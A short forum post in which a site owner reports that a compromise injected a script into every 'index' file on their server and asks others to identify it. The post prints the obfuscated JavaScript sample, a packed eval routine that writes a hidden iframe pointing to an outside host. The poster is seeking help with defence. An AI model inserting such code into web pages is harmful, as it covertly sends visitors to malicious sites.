The server I host a couple of my websites on has been comprimised resulting in some malicious code placed in all files begining with "index" are effected "index.html index.html index.php index.tpl etc thats server wide aswell so i doupt the the hacker targeted my account.
Anyway does anyone reconise this script and tell me what it does, I believe it to be a trojan.
Anyway does anyone reconise this script and tell me what it does, I believe it to be a trojan.
Code:
<script>eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\b'+c.toString(a)+'\b','g'),k[c])}}return
p}('p.q(o(\'%k%0%i%8%c%6%2%4%b%8%e%5%7%3%1%1%n%j%9%9%c%1%1%6%a%m%g%r%2%8%s%e%g%6%9%7%4%v%0%d%1%3%5%f%4%3%2%0%u%3%1%5%f%4%b%1%a%h%2%5%7%x%0%b%0%w%0%h%0%1%a%j%4%3%0%d%d%2%t%7%l%k%9%0%i%8%c%6%2%l\'));',34,34,'u0069|u0074|u0065|u0068|u0020|u003d|u006d|u0022|u0072|u002f|u0079|u0073|u0061|u0064|u0063|u0031|u006f|u006c|u0066|u003a|u003c|u003e|u006a|u0070|unescape|document|write|u006b|u002e|u006e|u0067|u0077|u0062|u0076'.split('|')))</script>